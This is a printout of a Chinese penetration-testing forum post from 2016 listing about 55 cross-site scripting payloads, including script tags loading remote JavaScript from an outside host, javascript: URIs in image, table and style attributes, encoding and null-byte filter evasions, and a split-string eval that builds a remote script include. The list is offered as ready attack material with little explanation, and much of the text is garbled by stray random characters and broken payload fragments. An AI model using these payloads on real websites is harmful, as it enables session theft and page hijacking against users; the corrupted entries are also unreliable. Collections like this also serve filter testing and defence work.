中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入) o5 |3 y: {! A6 F* y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 Z2 X) l  V/ a) P5 u5 N
(99)另类弹框
, [; ^* W+ v3 O' ^4 c7 S' }4 y
<q/oncut=alert()>12 C. r. @* \- j0 @& T2 ~
<s/onclick=alert()>b
9 f/ Z8 N0 Q- l% D: N6 L <XSS=" onclick="alert(1)//">clickme</SSX=">
" K) C- f2 h' @/ O: r5 Q9 M <zzz onclick=alert`1`>clickme</zzz> & l! O/ n5 J/ i- @
<a onclick=alert`1`>clickme</a>9 M2 {& q' Q% b+ p' o# k$ }
<a=">clickme</a=">
1 c/ T% [3 c4 W& Z<a=">clickme</a>
* H* O' h. q8 q3 n" w: D. s4 J<z=">clickme</z=">
( X1 H- z/ a, [" r3 {4 p6 u. {<z onclick=alert`1`>clickme</z>& V; r; S1 M7 |0 c* Z

6 W  B' u: k% F' i: W& I" V(2)IMG标签XSS使用JavaScript命令+ ^! b7 j5 k- S& H# s; N' A0 }3 f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 Q! l# |; c2 q$ e

. ?# ^% x4 B3 Q! v; X& Z' T
(3)IMG标签无分号无引号  F( B* b# i* w5 F# o
<IMG SRC=javascript:alert(‘XSS’)>
  b. C! U$ b4 f: t2 n6 h
/ P/ U3 `$ B* t5 d( O6 X' G2 |
(4)IMG标签大小写不敏感
) {; P1 ^( n: L9 A0 {$ ?( K
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" W; V( @* [& B) `; y; F

- ?/ Y" [: _& E; D( }
(5)HTML编码(必须有分号)7 T! \9 z! h+ ]) u) ]' m3 d
<IMG SRC=javascript:alert(“XSS”)>- P6 S+ w" X+ y  m) E0 I0 @/ J) v0 F6 Z

  q' W# [% Q0 ?  b
(6)修正缺陷IMG标签: c- U  A3 ~# z1 R4 \# B5 L
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 J4 G8 m; `- A0 T$ }! Y

- s/ W; `( W% E: C& d& ]
(7)formCharCode标签(计算器); R- d; ^* K! j$ d& E* q
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 [# d$ T' G3 C

6 J7 i" I& n6 ^% M- ]
(8)UTF-8的Unicode编码(计算器)
6 F+ _9 B6 I* A: ]. G
<IMG SRC=jav..省略..S')>
! f) r: w0 I9 J8 U4 G- W

& i* a9 L4 @: s$ b0 l
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 {4 Q; L8 _) \2 M2 M
<IMG SRC=jav..省略..S')>
. ]9 `5 y. ^! z- W$ \" }
* C/ h$ S# a- l! o
(10)十六进制编码也是没有分号(计算器)
5 c7 G" v; i! n; h* q
<IMG SRC=\'#\'" /span>
: q+ a. J5 s: N# F
' F3 s1 K/ W: L- m  f) {(11)嵌入式标签,将Javascript分开
8 h& ~( O5 m4 m* {; C) v/ @1 n0 E, c<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 \" b  m2 X' s$ l3 R  B+ b
+ @6 ]$ K5 ?1 e5 }(12)嵌入式编码标签,将Javascript分开, X% e. }$ t' k" T2 E; t1 _
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>1 `" A; T2 j$ ?& m4 w

, r& L/ T7 J0 _(13)嵌入式换行符# B2 P% Z' N2 f% _  u
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>- Y7 K- F- z: j" [& z

# x# t4 O0 @% b6 o(14)嵌入式回车9 |& D- A9 E0 r
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, \1 n+ W! W8 I+ S+ f, u4 b

$ l! e% I( o/ v0 x0 w! Q  L(15)嵌入式多行注入JavaScript,这是XSS极端的例子" T' z6 S' O9 M- p4 F2 Y
<IMG SRC=\'#\'" /span>
9 t4 w8 e5 Q! n' v8 u" U/ Y! d! B  e! I! c
(16)解决限制字符(要求同页面)
8 f- B& F' }) ]7 c1 v<script>z=’document.’</script>
8 T7 k9 H+ S1 S, H- n9 z8 G$ @- U<script>z=z+’write(“‘</script>2 ?% }4 R6 F+ r5 t; D3 u$ ]$ c6 A
<script>z=z+’<script’</script>
: ~' X) t" K" v2 J. @4 b' H6 l( ?<script>z=z+’ src=ht’</script>- Q* H4 w1 d! f9 t6 b, Z
<script>z=z+’tp://ww’</script>0 B) s3 q2 Z2 w, z; U1 M- z
<script>z=z+’w.shell’</script>4 D, J7 `; v+ M+ x% D% ]
<script>z=z+’.net/1.’</script>, G" b2 m; L" ]: L+ T
<script>z=z+’js></sc’</script>+ Y6 w  i/ N. u; j7 h& E* j' m6 y- m
<script>z=z+’ript>”)’</script>
% e; O( ~- n+ X9 f<script>eval_r(z)</script>
4 E# O/ s% I/ |; V+ v( a$ |6 t' D# z( V7 G  L8 k
(17)空字符% n4 h# F7 @( U& |
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
. E  k! ]. M+ m- G  [) D5 x) L% d! }
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用* S. ^' F; D2 W
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
" C8 |. }6 V& Q! G4 }$ `" ~- L% L( W, Z0 {1 t) Y$ ]
(19)Spaces和meta前的IMG标签' ?, a6 I) M; o6 k' F& T2 o* M/ N' a
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
- ~  j- e2 {5 O" O$ R% X/ I3 B5 ~7 h7 X6 y
(20)Non-alpha-non-digit XSS
9 m1 a1 p- r- w5 u; O<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>7 c) S# K. X% Q! r' B* O. F
) x" _: E: z+ b$ b
(21)Non-alpha-non-digit XSS to 2
% b  w# W: P/ l6 `<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 h- R$ |0 T8 |& A0 {) t9 {
2 O5 O2 d1 K1 i5 }' [
(22)Non-alpha-non-digit XSS to 3
) z* y* B! Z2 S7 X* p3 ^+ l5 b5 K/ f" Z<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
1 b1 [: `3 [5 {/ f8 Q% [: |0 B0 V+ }5 Q0 o+ _
(23)双开括号, [* l) R2 a6 }
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! t  T( O/ ~0 a3 x9 [2 v0 [2 b) y
(24)无结束脚本标记(仅火狐等浏览器)
& A* F9 B6 a7 C9 P! Q<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
5 a5 L+ _# R6 K) i9 o/ Z7 A" |0 j9 Y/ G% ^& b; c! X
(25)无结束脚本标记2( I; o- k" Y( x) h0 c
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 d" r, u) Y* `% c& C5 H2 W7 Z* T' i+ m- i% ]3 I  s
(26)半开的HTML/JavaScript XSS
# C$ T2 |+ o% L0 ^! t7 }<IMG SRC=\'#\'" /span>  z$ z2 _; p( Z  ~4 _5 R1 @. ?

, ?' J$ d) v% S( N: M: p' }(27)双开角括号$ D, w  X8 E" j. Y2 N- D; U* \
<iframe src=http://3w.org/XSS.html <2 S7 Y) Q3 c7 ~$ x/ W6 w7 g

' Z7 `; c9 h4 P% Q(28)无单引号 双引号 分号
8 O5 K$ o4 z- @% }( C<SCRIPT>a=/XSS/
8 [; u2 t4 B9 Falert(a.source)</SCRIPT>& l. |: t; e9 V" j, @9 |
- y3 i2 `7 j, _/ |0 m% U
(29)换码过滤的JavaScript+ W/ E* i/ @1 X& W3 J
\”;alert(‘XSS’);//
9 P$ `! a. G; J% Q+ [2 S
- s7 \! u. T, ~! {(30)结束Title标签: V' |; X# t! I$ w$ s6 h) }- U2 s. ~
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& n; s  d$ o& `0 z" `8 }# b; r5 N5 e  `5 A6 E8 X/ V( R: z$ H
(31)Input Image
# J9 _# w, r7 o! M<INPUT SRC=\'#\'" /span>
2 Z  [% J5 n$ D6 O$ ?: _4 P7 }5 T7 g; M# S+ e1 r+ l/ t" U) s
(32)BODY Image
: \6 k+ b5 O: K5 m% m/ E<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 K4 ~) z/ @1 ]8 A6 i. b1 b; L5 Y" E; H) D4 O
(33)BODY标签* `( B7 @. U1 }8 j& U5 e- Z
<BODY(‘XSS’)>2 K9 @9 `. e  S2 D, U5 M% d
& r5 L% ?+ A) ]+ U. Z& P' M: M
(34)IMG Dynsrc/ X+ ?# U. C( o
<IMG DYNSRC=\'#\'" /span>
  w6 A1 {! z3 a; h$ K' |/ d! d2 k9 M* _) T  b$ F8 y- j
(35)IMG Lowsrc3 k1 P0 I0 x! l
<IMG LOWSRC=\'#\'" /span>
. E+ J* x9 w, ]
: V$ n! f5 k4 g- g- G& h* K- z(36)BGSOUND
: Q: W+ y9 S' r: f) j8 X! T<BGSOUND SRC=\'#\'" /span>  [  v2 u5 \0 O

3 {- j+ g( }8 C+ z% `; z(37)STYLE sheet" X5 W6 [8 x# N. A' Q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& F& e2 [( f$ h
4 _  S1 K5 w& f8 c$ ]1 T: ?/ M(38)远程样式表1 m! Y2 V: m. L) G9 @
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 i$ z. [$ a# c0 W# q0 z, a) d/ ~$ o$ G' B+ U4 u" @+ I
(39)List-style-image(列表式); [) |7 ?9 J9 K
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, |# i. ]3 y! p, h5 X4 x7 G+ B2 W  x+ |$ R9 B' O) [
(40)IMG VBscript
2 b0 u2 [& T( ^7 b; B; j: R3 Y<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
5 R9 k! {! Y- C& y6 ?4 ~1 b5 `, H, r8 [& ]( D+ e" @7 [: t: V
(41)META链接url
) |* W$ {7 c4 X: S2 ^  S<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ s+ f1 w/ n: e+ o; P8 g
) ]7 O7 d! t* a- [) H" `
(42)Iframe8 g- L! }9 k8 P6 P
<IFRAME SRC=\'#\'" /IFRAME>
% F3 G5 |) D6 W2 \- ]
8 R1 @) k' k. u! o8 N( a/ K. C(43)Frame7 J/ X, L) r5 ], I: ]
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
6 y  y( ~' `- e0 F! N2 s' J& r- P4 C) J
(44)Table( z! V* e, f: q1 f! p2 ]7 m1 X: [
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 t' k9 P. H6 a

& J1 E) L. B, E* g7 @) i(45)TD
/ f! M# K- U% W9 n<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# I. u$ _4 d! Y$ b: v+ Z/ `
& f1 O; s! V- P7 j* Z2 d' K9 C: ^, Y(46)DIV background-image* |2 `1 n# l7 p4 l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 G, M  D7 W2 g0 }6 x; X
9 z8 J* f! v" y* p2 x
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- W# c6 g# y3 y7 \, J0 ?9 _
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' e5 z. S: w; Q+ ]* \* z% o. }& s, [; U) R
(48)DIV expression
+ `* a2 e% H% P4 b" I5 b) J8 I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ y4 J1 d! A% e2 G" ?

! I# t) T2 L4 r7 Y: P(49)STYLE属性分拆表达- `! j9 a7 f7 r& U
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ u4 Y. }* [3 |: w
* V% m# o" ^" R, r. t! F) ](50)匿名STYLE(组成:开角号和一个字母开头), b- L2 f0 a/ `( @. E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; ^  F; w$ F. H& _9 w3 B7 b
% [  ~1 Y* o, D; \5 F9 i6 a# P. a2 B(51)STYLE background-image8 h2 a  O& @) ?- y& ^
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 H6 z& ~$ ~8 ]' t' k% R

7 \6 {1 T' M9 _. z' }: J(52)IMG STYLE方式8 h% B! _% v: r' B5 }4 l
exppression(alert(“XSS”))’>
% f3 ?/ J( r8 [6 m  B4 G- \" ?! {4 E" R$ X
(53)STYLE background
" K- s$ d2 C( h* T) z4 n1 ]<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ a5 K. N1 y4 D" W; J5 A$ m; r6 T! w" H" f0 v% a
(54)BASE- m7 D' k  {! G3 ~+ n; s' p2 c* y
<BASE HREF=”javascript:alert(‘XSS’);//”>
3 v; G6 c& j: o  K0 l6 J- B
7 H; Z" _9 g# Y5 D; o, r(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; x+ x) K( m2 M7 H1 r. o
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

8 Z  I, `# e9 T1 e2 _7 e9 s




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2